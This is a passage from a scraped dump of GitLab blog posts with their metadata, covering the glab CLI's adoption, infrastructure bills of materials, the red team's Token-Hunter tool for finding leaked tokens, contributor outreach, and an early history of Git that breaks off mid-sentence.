time by avoiding the need to switch between browser tabs, IDE and terminal. He initially shared the script with some of his colleagues who also found it helpful. Ultimately, Clement made the decision to open source it and since then over 80 other [contributors](https://github.com/profclems/glab/graphs/contributors) have continued to build on the tool, adding commands to interact with merge requests, issues, pipelines, and more.\n\nWe heard about  `glab` from Clement back in 2020, when the project was still early in its life cycle. We were excited about the area, but couldn’t commit at the time to giving it the long-term support it deserved. Fast forward to 2022. We felt it made sense to check in with Clement to see how the project was progressing. After a few conversations, everyone involved felt that GitLab would be a great home for long-term support and community contributors. We [adopted the project](https://github.com/profclems/glab/issues/983).\n\n## Providing a seamless transition\n\nOver the past several months, we’ve been [transitioning](https://gitlab.com/groups/gitlab-org/-/epics/7514) the project to GitLab. During the transition we’ve learned a lot about what it takes to migrate an active project to new tooling. Our efforts to adapt [GitHub Actions to GitLab CI](https://gitlab.com/groups/gitlab-org/-/epics/7784) have given us great insights into that process as users, and something we’ll be looking to share more about in a future post. We also needed to unwind some previous documentation changes by [converting them back to Markdown](https://gitlab.com/gitlab-org/cli/-/issues/1010), for compatibility with the rest of GitLab’s internal processes.\n\nFurthermore, we knew we needed to provide users with a secure experience. Prior to adoption and launch, our application security team reviewed the project and provided feedback to ensure `glab` was safe, secure, and ready for more users. \n\nWith everything ready to go, we worked across the ecosystem to [update distribution methods](https://gitlab.com/groups/gitlab-org/-/epics/8251) to point to [the new repository](https://gitlab.com/gitlab-org/cli). Our goal was to provide a seamless transition for contributors to continue working, and for users to continue receiving updates.\n\n## Strengthened by community\n\nIt’s taken a small army of people to make the adoption of `glab` complete. A special thanks to [Gary](https://gitlab.com/garyh) who stepped up to lead the engineering efforts on our side. He’s been wonderfully supported by [Kerri](https://gitlab.com/kerrizor), [Tomas](https://gitlab.com/viktomas), and many others inside of GitLab who have had a passion for this project. Our external community has also come along for the ride. We’ve had over [over 35 community contributions](https://gitlab.com/gitlab-org/cli/-/merge_requests?scope=all&state=all&label_name%5B%5D=Community%20contribution), ranging from first-time contributors to seasoned `glab` contributors. (Including Clement, who remains active in the project!).\n\n[GitLab CLI v1.24.1](https://gitlab.com/gitlab-org/cli/-/releases/v1.24.1) contains over 40 new features, bug fixes, security fixes and many more improvements since the last release. You can see the full [changelog](https://gitlab.com/gitlab-org/cli/-/releases/v1.24.1#changelog) on our releases page. Thank you to everyone who’s contributed to make all of this possible.\n\n## Want to get started now?\n\nIf you’re on macOS (and have [Homebrew](https://brew.sh/) installed) the fastest way to get started is by running:\n\n```\nbrew install glab\n```\n\nThis will install the latest version of the GitLab CLI and immediately make it available for you. Not on macOS? We have [installation instructions](https://gitlab.com/gitlab-org/cli#installation) for [Windows](https://gitlab.com/gitlab-org/cli#windows) and [Linux](https://gitlab.com/gitlab-org/cli#linux) too. \n\nAs part of getting things setup, you’ll need to set up the CLI to use a personal access token for [authentication](https://gitlab.com/gitlab-org/cli#authentication). You can do this with the `glab auth login` command and follow the prompts. Alternatively, you can use 1Password Shell Plugins to authenticate your session. With this feature, you can: \n\nSecure your personal access tokens in encrypted 1Password vaults.\nAuthenticate specific terminal sessions to access those tokens by scanning your fingerprint or using other biometrics. \n\nThis approach eliminates the need to type tokens or passwords into the terminal while removing plaintext keys from your disk. Plus, as you work across devices or environments, your key moves with you in 1Password, reducing setup time and simplifying collaboration. [Check out the 1Password documentation to get started.](https://developer.1password.com/docs/cli/shell-plugins/gitlab/).\n\n![1Password documentation](https://about.gitlab.com/images/blogimages/1passworddocumentation.png)\n\n\n## What are we doing next?\n\nNow that we’ve officially released the GitLab CLI, we’re going to spend some time taking a closer look at the issue backlog. We want to learn what the community is looking for in a CLI tool, and where opportunities exist to extend capabilities further into developer workflows. You’ll see the GitLab team more involved in discussing feature proposals and triaging bugs as we continue to ramp up on the project.\n\n## What do you want to see?\n\nThe GitLab CLI was born out of the community, and we want to continue collaborating with all of you in its future direction. If you have ideas for new features or encounter a bug, [open an issue](https://gitlab.com/gitlab-org/cli) and let us know or – in true GitLab form – [everything starts with a merge request](https://gitlab.com/gitlab-org/cli).\n",[1495,9,282],{"slug":3428,"featured":6,"template":689},"introducing-the-gitlab-cli","content:en-us:blog:introducing-the-gitlab-cli.yml","Introducing The Gitlab Cli","en-us/blog/introducing-the-gitlab-cli.yml","en-us/blog/introducing-the-gitlab-cli",{"_path":3434,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3435,"content":3441,"config":3446,"_id":3448,"_type":14,"title":3449,"_source":16,"_file":3450,"_stem":3451,"_extension":19},"/en-us/blog/introducing-the-infrastructure-bill-of-materials",{"title":3436,"description":3437,"ogTitle":3436,"ogDescription":3437,"noIndex":6,"ogImage":3438,"ogUrl":3439,"ogSiteName":673,"ogType":674,"canonicalUrls":3439,"schema":3440},"Introducing the infrastructure bill of materials","Pair IBoMs and SBOMs for a more secure software supply chain.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671160/Blog/Hero%20Images/ibom.jpg","https://about.gitlab.com/blog/introducing-the-infrastructure-bill-of-materials","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Introducing the infrastructure bill of materials\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Cindy Blake\"}],\n        \"datePublished\": \"2022-09-22\",\n      }",{"title":3436,"description":3437,"authors":3442,"heroImage":3438,"date":3443,"body":3444,"category":865,"tags":3445},[2407],"2022-09-22","\nAll eyes are on software supply chain security and organizations are busily generating software bills of materials, or SBOMs. But many are leaving out an equally critical part of software supply chain security: their infrastructure. GitLab has partnered with Firefly to help DevOps teams create bills of materials across the entire cloud footprint. \n \nThe SBOM, which is an ingredient list that identifies third-party and open source code used within software (a.k.a. dependencies), came into the spotlight with the U.S. Executive Order on \"Improving the Nation's Cybersecurity\" and its resulting [NIST guidelines to secure the software supply chain](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/).\n \nWhile SBOMs begin to peel back the layers on risky code using elements such as [composition analysis](/handbook/engineering/development/sec/secure/composition-analysis/) to scan for dependencies in containers, more attention must be paid to how cloud infrastructure, a critical part of the software development lifecycle, is managed and secured.\n \n## Assessing cloud infrastructure\n \nWhen people think about software integrity, they tend to think about applications. Yet with the rise of cloud computing, cloud native applications, and modern CI/CD pipelines, there is a considerable amount of code used to automate how infrastructure resources are provisioned, secured, and consumed. In fact, the cloud is defined using [infrastructure-as-code](/blog/fantastic-infrastructure-as-code-security-attacks-and-how-to-find-them/) (IaC), and most of the power attributed to applications relies on infrastructure capabilities, configurations, permissions, and relations. Understanding an application's relationship with the underlying infrastructure and how it is configured is just as important to supply chain security as understanding an application’s usage of third-party and open source code. \n \nThe challenge is that it’s not easy to do. This infrastructure software, often referred to as cloud assets, includes resources provided by cloud services, orchestrators like Kubernetes, and even policies. Google Cloud nicely [lists its assets](https://cloud.google.com/asset-inventory/docs/supported-asset-types) as an example. Increasingly, companies are [using more than one cloud service provider](https://www.cncf.io/wp-content/uploads/2022/02/CNCF-AR_FINAL-edits-15.2.21.pdf) for different workloads, and each service uses different constructs. Even with a single provider, many companies organize their applications into multiple AWS accounts or GCP projects. It can be difficult to see what assets an organization has across these silos.\n \n## Enter the IBoM\n \nDespite these challenges, just as an organization needs to list all the application code dependencies, it also needs to list all the infrastructure components across multiple clouds, multiple accounts, and Kubernetes. Together, they make up the infrastructure bill of materials, or IBoM. These assets must be tracked and managed closely as they can be changed and, if not properly governed, can wreak havoc on the stability and consistency of an application’s performance, creating troubleshooting problems.\n \nThe IBoM is the first key to understanding an organization’s complete cloud footprint and being able to better secure the software supply chain.\n \nThe second key, and equally important, is managing the integrity of that IBoM. The configuration of cloud assets such as S3 buckets, identity and access management roles, EC2, database instances, and Kubernetes clusters determines access to data and what resources are available to an application. The configuration also impacts the stability of the infrastructure upon which the applications depend.\n \nWith the surge of cloud native applications, the burden of managing this infrastructure has increased exponentially. To meet the challenge of governing this complex infrastructure, organizations have been codifying these cloud assets into IaC using tools like Terraform, Pulumi, and Helm. Once codified as IaC, they can utilize version control and be governed with the same rigor as application software – all within a DevOps platform like GitLab. This approach is typically called [GitOps](/topics/gitops/). It's important for the security of your supply chain because it provides visibility, traceability, and policy enforcement for your infrastructure software.\n \n## How Firefly and GitLab work together\n \n[Firefly’s Cloud Asset Management solution](https://www.gofirefly.io/) can help GitLab’s DevOps platform manage both application software and cloud infrastructure software - across an organization’s cloud footprint. Firefly essentially extends the GitLab [GitOps solution](/solutions/gitops/) to cover even more of your cloud and provides additional governance via drift detection and remediation.\n\nFirst, Firefly discovers all of an organization’s cloud infrastructure across AWS accounts, GCP projects, Kubernetes, and even SaaS application environments, providing an IBoM in one dashboard. Unmanaged and misconfigured environments are identified for DevOps. With a click, these unmanaged cloud assets are automatically coded into IaC such as Terraform or Helm, potentially saving engineering time and getting DevOps teams toward a more fully managed software supply chain.\n\nNow, as IaC, these cloud assets can be monitored for changes. Firefly continuously assesses drift between an organization’s desired IaC state and its actual cloud and Kubernetes configurations, helping ensure these configurations and policies remain enforced. When changes are made to either IaC or the underlying infrastructure, Firefly automatically creates a GitLab merge request to ensure changes to an organization’s infrastructure software are managed using DevOps automated CI/CD.\n \nFirefly and GitLab together enable DevOps teams to add to the security of their supply chains by generating IBoMs, applying version control, automation, and governance to the applications and infrastructure upon which they rely. Learn more about the [Firefly/GitLab integration](https://www.gofirefly.io/partners/gitlab) and give Firefly a try. \n\n\n_Blake is vice president of marketing at Firefly._\n\nCover image by [Edge2Edge Media](https://unsplash.com/photos/t1OalCBUYRc) on Unsplash\n{: .note}\n",[865,231,9],{"slug":3447,"featured":6,"template":689},"introducing-the-infrastructure-bill-of-materials","content:en-us:blog:introducing-the-infrastructure-bill-of-materials.yml","Introducing The Infrastructure Bill Of Materials","en-us/blog/introducing-the-infrastructure-bill-of-materials.yml","en-us/blog/introducing-the-infrastructure-bill-of-materials",{"_path":3453,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3454,"content":3460,"config":3466,"_id":3468,"_type":14,"title":3469,"_source":16,"_file":3470,"_stem":3471,"_extension":19},"/en-us/blog/introducing-token-hunter",{"title":3455,"description":3456,"ogTitle":3455,"ogDescription":3456,"noIndex":6,"ogImage":3457,"ogUrl":3458,"ogSiteName":673,"ogType":674,"canonicalUrls":3458,"schema":3459},"Introducing Token-Hunter","Our red team has created a new tool to find sensitive data in the vast, wide-open.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679669/Blog/Hero%20Images/lightscape-Bsw6l6e01Rw-unsplash.jpg","https://about.gitlab.com/blog/introducing-token-hunter","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Introducing Token-Hunter\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Greg Johnson\"}],\n        \"datePublished\": \"2019-12-20\",\n      }",{"title":3455,"description":3456,"authors":3461,"heroImage":3457,"date":3463,"body":3464,"category":865,"tags":3465},[3462],"Greg Johnson","2019-12-20","\n\nWe operate business at GitLab in a [“public by default”](https://handbook.gitlab.com/handbook/values/#public-by-default) mindset so other people can benefit from our transparent business practices. Defaulting to public sharing also means we store massive amounts of data in a public format by design. Much of what we do as a company takes the form of a GitLab issue and is open for the world to see, including those individuals with nefarious goals. Naturally, for a [Red Team](/handbook/security/threat-management/red-team/), we’re curious about what all of this public information could do to aid someone intent on attacking GitLab. We started our investigation by identifying those secrets that are unintentionally shared across the assets we make public like issues, issue discussions, merge requests, merge request discussions, and snippets. There was no tooling available that accomplished what we set out to do, so we developed it ourselves and just released it: [Token-Hunter](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter).\n\n### Background\n\nAPI tokens are a keystone in the development world. They facilitate important functionality not only in the software developers build, but also in the deployment, maintenance, integration, and security of both closed and open source projects. Many companies providing services on the internet offer API tokens in multiple flavors that allow interaction with their systems, as does GitLab. Ideally, these tokens offer configurable access control to otherwise closed systems allowing you to impersonate a user’s session and access raw data. Developers, DevOps professionals, infrastructure professionals and the like often depend on API tokens to do their job successfully.\n\nIt’s a common and understandable mistake to make a commit to a Git repository containing one of these tokens when building software in a shared environment. Moving quickly, trying to support your fellow developer, and generally working quickly to get things done efficiently can lead to mistakes made under pressure, which can happen to us all. Popular tools that search for these commits like [gitrob](https://github.com/michenriksen/gitrob), [TruffleHog](https://github.com/dxa4481/truffleHog), [gitleaks](https://github.com/zricethezav/gitleaks), and even GitLab’s own [SAST project](https://docs.gitlab.com/ee/user/application_security/sast/) can find leaked tokens given proper configuration. Our Red Team had early success leveraging these known techniques, tactics, and procedures (TTPs).\n\nThe tools referenced above are fantastic at finding secrets unintentionally left in source code. However, it's also a common mistake to submit sensitive data like API tokens, usernames, and passwords to public locales like [GitLab snippets](https://docs.gitlab.com/ee/user/snippets.html), [issues](https://docs.gitlab.com/ee/user/project/issues/), [issue discussions](https://docs.gitlab.com/ee/api/discussions.html), [merge requests](https://docs.gitlab.com/ee/user/project/merge_requests/), and [merge request discussions](https://docs.gitlab.com/ee/api/discussions.html). Sharing this type of information by accident can happen easily when attempting to share relevant information to facilitate a public support request as we often do at GitLab for many different products. Though most people know not to post sensitive information in a public place directly, mistakes do happen, sometimes shortcuts are taken, logs get shared, configuration files get dropped, and information inadvertently gets leaked and leveraged.  More often than not these areas of exposure are often forgotten, but not by attackers.\n\n### Exploring the wide-open\n\nToken-Hunter is intended to complement tools like gitrob, gitleaks, TruffleHog, and others. It can be used if you’re hosting your groups and projects on GitLab.com, or on a self-managed GitLab instance of your own. We created Token-Hunter to support the following features:\n\n- **Search GitLab issues and the related discussions for sensitive data.** GitLab issues and comments are a primary method of sharing information and resolving support issues. They typically contain shared log data, configuration files, copy/pasted [source code](/solutions/source-code-management/) examples, and discussions by both GitLab employees and customers, and are therefore likely to contain sensitive data.\n- **Search GitLab snippets for sensitive data.** These are small, URL-addressable chunks of code or text intended to be shared between GitLab users or served directly in source code. They are most often used to share small bits of configuration data, JavaScript source code, example code in any language, or log data. Therefore, they can likely contain sensitive information like usernames and passwords, API tokens, etc.\n- **Search GitLab merge requests and discussions for sensitive data.** Merge requests and comments are, more often than not, how public open source projects recieve changes from the community.  At GitLab, merge requests facilitate everything from [handbook updates](https://about.gitlab.com/company/culture/all-remote/handbook-first-documentation/) to [GitLab runner](https://gitlab.com/gitlab-org/gitlab-runner) code changes for both internal employees and external contributors.  Descriptions and discussions on these assets can include log data, system access instructions, and the like.\n- **List all of the projects associated with a group.** This is helpful to quantify the problem and understand where the search will start. Optionally, you can include members’ projects in the search to expand the organizational scope similar to gitrob. Starting at different points in the project after you understand your target more completely can yield very different results.\n- **Proxy all traffic from the tool.** Token-Hunter accepts arguments for an HTTP proxy server and self-signed certificate to decrypt TLS traffic. GitLab’s Red Team used this feature to record traffic pattern examples to the Security Operations team in support of defensive strategy development. This feature is also handy for debugging by examining the traffic the tool generates. [Burp Suite](https://portswigger.net/burp/communitydownload) and [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) are two popular tool choices for proxying traffic locally and can be configured with a self-signed certificate to decrypt TLS traffic.\n\nFor full details on using the tool and the functionality of each of its available arguments, visit [the Token-Hunter project page](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/tree/master) on GitLab.\n\n### Taming the wild... mostly\n\nHitting an API to gather large amounts of raw data is daunting. Internet connections flake out, servers need maintenance, rate limits get hit, WiFi drops, performance degrades, timeouts happen, and you end up with a headache attempting to simply get the data you’d like to analyze. To counter some of these issues as pragmatically as possible, two simple algorithms were applied: request retries and dynamic page-size reduction. Request retries simply retries a failed request after a few seconds. The tool will retry a failed request twice, each after a four-second delay with a four-second backoff. In other words, the first retry will occur four seconds after the initial failed request. The second retry will occur eight seconds after the first failed retry attempt. If each of these retry attempts fails, the tool then attempts to reduce the paging size in order to complete the request. Reducing the page size reduces the number of records the request needs to return lessening the likelihood of a timeout. *Though simple, these two algorithms allowed the tool to reliably pull data for nearly 1.3 million individual GitLab assets with only three recorded request errors resulting in over 1600 pattern matches.*\n\n### More to explore\n\nThe ability to search discussions and other popular channels where sensitive data is likely to be shared is the key benefit of the Token-Hunter tool over other related tooling. The Red Team plans to continue iterating to support our operations, including adding support for more assets such as [merge requests](https://docs.gitlab.com/ee/user/project/merge_requests/), commit discussions, and [epics](https://docs.gitlab.com/ee/user/group/epics/). We learned during our operation that the specifics of the regular expressions we used in relation to the context in which we were searching (posted log data format, configuration file format, code structure, etc.) largely determined our level of success. It can be necessary to tune these expressions depending on your environment and context. To start, we made a few adjustments to [TruffleHog’s regular expressions](https://github.com/dxa4481/truffleHogRegexes) to add coverage for GitLab-specific token formats. However, there’s still much room for improvement depending on your environment and objective.\n\nLooking for a specific password for a user name? Trying to find all mentions of a specific server DNS name or IP? Expecting a specific log format that has the potential to contain an API token? Tune [the regular expressions](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/blob/master/regexes.json), and you just may find what you’re looking for.\n\n### We want your ideas and contributions\n\nThere is still plenty to be done and we welcome community contributions and ideas. If the tool is helpful to you in defense of your infrastructure and you’d like to contribute, [there are instructions in the README.md](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter#contributing) on how to get started. If you’re not sure what to do, pick an issue out of [our issue list](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/issues) or add to the existing discussions.  I'd like to extend a special thank you to GitLab user [Ohad Dahan](https://gitlab.com/ohaddahan) for his many contributions to this and other GitLab projects.  These types of contributions are paramount to the continued success of open source projects.\n\nSome of the ideas we’re currently pursuing are:\n\n- **Better output formatting:** We’d like to standardize output to an industry accepted, standard format that allows support for findings verification. A simple CSV file might be the first step.\n- **Real-time reporting of findings:** Currently, the tool gathers data first, then reports on the findings, leaving you in way too much suspense for way too long. Reporting findings as they are found allows verification to begin earlier during a long-running execution.\n- **Data persistence:** Querying the API is the costliest part of inspecting GitLab assets for sensitive data. Persisting that data from an execution would:\n  - Reduce the need to query the API again after tuning your regular expressions. During our operation, we often needed to make changes to the regular expressions based on what we were seeing in the matches. This was virtually impossible given the amount of data necessary to pull.\n  - Allow for long-running executions to be paused and resumed. Executions against larger groups can take several hours and would sometimes require a restart during our operation.\n  - Maintain a permanent record of findings should they be edited following a found match. During our exercise, there were a few occasions where matches were found that looked to be legitimate, but could not be verified as the asset was modified post-discovery.\n\nWe have learned a lot from this initial attempt at gathering OSINT from rather unique and unorthodox locations, but this exercise was just a start. We hope you find the tooling useful and if you have questions or ideas to share please reach out through [email](mailto:redteam@gitlab.com), through our [issue board](https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/-/boards), or [on Twitter](https://twitter.com/code_emitter). Happy hacking!\n\nPhoto by [Lightscape](https://unsplash.com/@lightscape?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/photos/Bsw6l6e01Rw).\n{: .note}\n",[865,3091,9],{"slug":3467,"featured":6,"template":689},"introducing-token-hunter","content:en-us:blog:introducing-token-hunter.yml","Introducing Token Hunter","en-us/blog/introducing-token-hunter.yml","en-us/blog/introducing-token-hunter",{"_path":3473,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3474,"content":3479,"config":3484,"_id":3486,"_type":14,"title":3487,"_source":16,"_file":3488,"_stem":3489,"_extension":19},"/en-us/blog/join-the-gitlab-community",{"title":3475,"description":3476,"ogTitle":3475,"ogDescription":3476,"noIndex":6,"ogImage":2028,"ogUrl":3477,"ogSiteName":673,"ogType":674,"canonicalUrls":3477,"schema":3478},"Join the GitLab Code Contributor Community!","How we're working to make contributions easier and more rewarding for the GitLab community.","https://about.gitlab.com/blog/join-the-gitlab-community","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join the GitLab Code Contributor Community!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-08-13\",\n      }",{"title":3475,"description":3476,"authors":3480,"heroImage":2028,"date":3481,"body":3482,"category":10,"tags":3483},[704],"2018-08-13","\nThere are [over 2,000 code contributors to GitLab](http://contributors.gitlab.com/) today and we want to welcome more contributors to the growing community.\n\nHaving been involved in other open source projects, I know how exciting it is to collaborate in an open community and work with passionate people from different parts of the world. I recently joined GitLab to work with our community of contributors, and I wanted to share a list of activities that I’m planning to help grow the community:\n\n## 1. Streamline onboarding documentations\n\nSo that it’d be easier for people to get started. There are already some initiatives on the way, such as this [merge request from a community member](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/20682).\n\n## 2. Proactively reach out to first-time contributors\n\nI want to start congratulating new contributors who successfully complete their first merge request. Stay tuned for new swag and opportunities to be paired with mentors who are experienced GitLab community members.\n\n## 3. Launch new blog post series\n\nSpeaking of experienced contributors, I’d like to highlight some of them with a new blog post series, since their experience working in the GitLab community will be helpful for new contributors. The first post features Core Team member [Vitaliy Klachkov](/blog/contributor-post-vitaliy/).\n\n## 4. Kick off Core Team meeting\n\nWe just kicked off a regular meeting with the [Core Team](/community/core-team/) to discuss topics of interest for the GitLab community. This recorded meeting will be open to anyone. The Core Team will also use [Service Desk](https://gitlab.com/gitlab-core-team/general/issues/service_desk) so that anyone in the community can view and participate in discussions.\n\nThanks for reading my blog post. Your feedback/questions are always welcome and you can reach me at rpaik@gitlab.com.\n\n## Interested in learning how you can contribute?\n\nA good place to start would be the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, and translation.\n",[267,779,9],{"slug":3485,"featured":6,"template":689},"join-the-gitlab-community","content:en-us:blog:join-the-gitlab-community.yml","Join The Gitlab Community","en-us/blog/join-the-gitlab-community.yml","en-us/blog/join-the-gitlab-community",{"_path":3491,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3492,"content":3498,"config":3503,"_id":3505,"_type":14,"title":3506,"_source":16,"_file":3507,"_stem":3508,"_extension":19},"/en-us/blog/journey-through-gits-20-year-history",{"title":3493,"description":3494,"ogTitle":3493,"ogDescription":3494,"noIndex":6,"ogImage":3495,"ogUrl":3496,"ogSiteName":673,"ogType":674,"canonicalUrls":3496,"schema":3497},"Journey through Git's 20-year history","Follow along as we reminisce about the first commit, the unique aspects of the earliest releases, and the confusion sparked by an update to the git-push(1) default behavior.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097380/Blog/Hero%20Images/Blog/Hero%20Images/git-20-years-opt2_TWNsNk8KH43b3jP0KLD0U_1750097380123.png","https://about.gitlab.com/blog/journey-through-gits-20-year-history","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Journey through Git's 20-year history\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2025-04-14\",\n      }",{"title":3493,"description":3494,"authors":3499,"heroImage":3495,"date":3500,"body":3501,"category":10,"tags":3502},[747],"2025-04-14","The Git project has just turned 20 years old. A lot has happened during these years, and while the conceptual design of Git hasn't changed significantly since its inception, the way users interact with the tool has changed quite significantly. We at GitLab are proud to build on top of this critical piece of software and to be part of its history.\n\nJoin us on a journey through Git's history to explore how it has evolved over the years.\n\n## The first commit\n\nThe first commit was made on April 7, 2005, by Linus Torvalds, the creator of the Linux kernel: `e83c5163316 (Initial revision\nof \"git\", the information manager from hell, 2005-04-07)`.\n\nAs we can see, this\ncommit does not contain a lot of files:\n\n```shell\n$ git ls-tree e83c5163316\n100644 blob a6bba79ba1f46a1bbf7773449c3bd2bb9bf48e8b\tMakefile\n100644 blob 27577f76849c09d3405397244eb3d8ae1d11b0f3\tREADME\n100644 blob 98a32a9ad39883c6d05a000a68511d4b1ee2b3c7\tcache.h\n100644 blob 74a0a234dd346fff51c773aa57d82fc4b83a8557\tcat-file.c\n100644 blob 840307af0cfaab31555795ce7175d5e9c9f981a0\tcommit-tree.c\n100644 blob 25dc13fe101b219f74007f3194b787dd99e863da\tinit-db.c\n100644 blob c924a6e0fc4c36bad6f23cb87ee59518c771f936\tread-cache.c\n100644 blob 1b47742d8cbc0d98903777758b7b519980e7499e\tread-tree.c\n100644 blob b8522886a15db861508fb6d03d4d88d6de912a4b\tshow-diff.c\n100644 blob 5085a5cb53ee52e1886ff6d46c609bdb2fc6d6cd\tupdate-cache.c\n100644 blob 921f981353229db0c56103a52609d35aff16f41b\twrite-tree.c\n```\n\nIn addition to build infrastructure, the first commit provides seven top-level commands:\n\n- `init-db` to initialize a new Git repository\n- `update-cache` to add files to the index\n- `write-tree` to take what is in the index and create a new tree from it\n- `read-tree` to read a tree object\n- `commit-tree` to create a commit from a tree\n- `cat-file` to read a specific object into a temporary file\n\nNote that the `git` command itself did not yet exist at this point in time.\nInstead, these commands had to be executed directly.\n\nAs example, let's create a\nnew repository:\n\n```shell\n$ mkdir repo\n$ cd repo\n$ init-db\ndefaulting to private storage area\n$ ls -a\n.  ..  .dircache\n```\n\nThat looks quite unfamiliar: There is no `.git` directory, but there is a\n`.dircache` directory. And where was the private storage area?\n\nThe early design of Git distinguished between a \"shared\" and \"private\" object\nstorage area. This object storage area was where all of your Git objects went. For example, your\ncommits and blobs.\n\nBy default, `init-db` created a private object storage area that was only used for\nthe managed directory that it was created in. A \"shared\" object storage area, on\nthe other hand, shared object content across multiple managed directories so\nthat the same object did not need to be stored twice.\n\n### Create a commit\n\nSo, now that we have a repository, how did we create a commit? Well, it isn't as\neasy as today's `git add . && git commit`. Instead, you had to:\n\n1. Update the index by calling `update-cache` for every file that you want to\n   add.\n1. Write a new tree by calling `write-tree`, which takes everything you have\n   added to the index.\n1. Set up environment variables to tell Git who you are.\n1. Write a commit object by calling `commit-tree`.\n\nLet’s create a commit in the repository:\n\n```shell\n$ echo content-1 >file-a\n$ update-cache file-a\n$ echo content-2 >file-b\n$ update-cache file-b\n$ write-tree\n3f143dfb48f2d84936626e2e5402e1f10c2050fb\n$ export COMMITTER_NAME=\"Patrick Steinhardt\"\n$ export COMMITER_EMAIL=ps@pks.im\n$ echo \"commit message\" | commit-tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nCommitting initial tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\n5f8e928066c03cebe5fd0a0cc1b93d058155b969\n```\n\nThis isn't exactly ergonomic, but it works! Let's have a look at the generated\ncommit:\n\n```shell\n$ cat-file 5f8e928066c03cebe5fd0a0cc1b93d058155b969\ntemp_git_file_rlTXtE: commit\n$ cat temp_git_file_rlTXtE\ntree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nauthor Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\ncommitter Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\n\ncommit message\n```\n\nNote that `cat-file` didn't print the contents directly, but instead wrote\nit into a temporary file first. But the contents of the file looked exactly how a\nmodern commit would look.\n\n### Making changes\n\nNow that we have files, how do we get their status? You might have guessed it:\nthis could be done with `show-diff`:\n\n```shell\n$ show-diff\nfile-a: ok\nfile-b: ok\n\n$ echo modified-content >file-a\n$ show-diff\n--- -\t2025-03-26 13:14:53.457611094 +0100\n+++ file-a\t2025-03-26 13:14:52.230085756 +0100\n@@ -1 +1 @@\n-content-1\n+modified-content\nfile-a:  46d8be14cdec97aac6a769fdbce4db340e888bf8\nfile-b: ok\n```\n\nAmazingly, `show-diff` even knew to already generate diffs between the old and\nnew state of modified files! Funny enough though, Git achieved this by simply\nexecuting the diff(1) Unix tool.\n\nIn summary, all of this was still rather bare-bones, but it performed all of the\nnecessary duties to track history. There were still many limitations:\n\n- There was no easy way yet to switch between commits.\n- There was no way to show logs.\n- There were no branches, tags, or even references. Users were expected to manually\n  keep track of object IDs.\n- There was no way to synchronize two repositories with one another. Instead,\n  users were expected to use rsync(1) to synchronize the `.dircache` directories.\n- There was no way to perform merges.\n\n## Git 0.99\n\nThe first test release of Git was Version 0.99. This release came only two months after\nthe initial commit, but already contained 1,076 commits. There had been almost 50\ndifferent developers involved. The most frequent committer at this point was\nLinus himself, but he was closely followed by Junio Hamano, the current maintainer.\n\nA lot of things had changed since the initial commit:\n\n- Git started to track different development branches by using references, which\n  in most cases removes the need to manually track object IDs.\n- There was a new remote protocol that allows two repositories to exchange\n  objects with one another.\n- The `.dircache` directory was renamed to `.git`.\n- It became possible to merge single files with one another.\n\nThe most important visible change, though, was the introduction of\nthe top-level `git` command and its subcommands. Interestingly, this release\nalso created the notion of \"plumbing\" and \"porcelain\" commands:\n\n- \"Plumbing\" tools are the low-level commands that access the underlying Git\n  repository.\n- \"Porcelain\" tools are shell scripts that wrap the plumbing commands to provide\n  a nicer, high-level user interface.\n\nThis split still exists nowadays as documented in\n[`git(1)`](https://git-scm.com/docs/git#_high_level_commands_porcelain), but because \nmost porcelain tools have been rewritten from shell scripts to C, the line between these two\ncategories has started to blur significantly.\n\n## Linus hands over maintainership\n\nLinus never started Git out of love for version control systems, but because there was a need to replace BitKeeper for Linux kernel development. As such, he never planned to keep maintaining Git forever. The intent was to maintain it until someone trustworthy stepped up.\n\nThat someone was Junio Hamano. Junio got involved in Git about a week after Linus’s first commit and already had a couple of hundred commits in the history after the Git 0.99 release. So, on July 26, 2005, [Linus made Junio the new maintainer of the Git project](https://lore.kernel.org/git/Pine.LNX.4.58.0507262004320.3227@g5.osdl.org/). While Linus has continued to contribute to Git, his involvement with the project faded over time, which is only natural considering that he is quite busy as head of the Linux project.\n\nJunio is still leading the Git project today.\n\n## Git 1.0\n\nThe first major release of Git happened on December 21, 2005, by\nJunio. Interestingly enough, there had been 34 releases between Version 0.99\nand Version 1.0: 0.99.1 to 0.99.7, 0.99.7a to 0.99.7d, 0.99.8 to 0.99.8g, and\n0.99.9 up to 0.99.9n.\n\nOne of the more important milestones since 0.99 was probably the addition of the `git-merge(1)`\ncommand that allows one to merge two trees 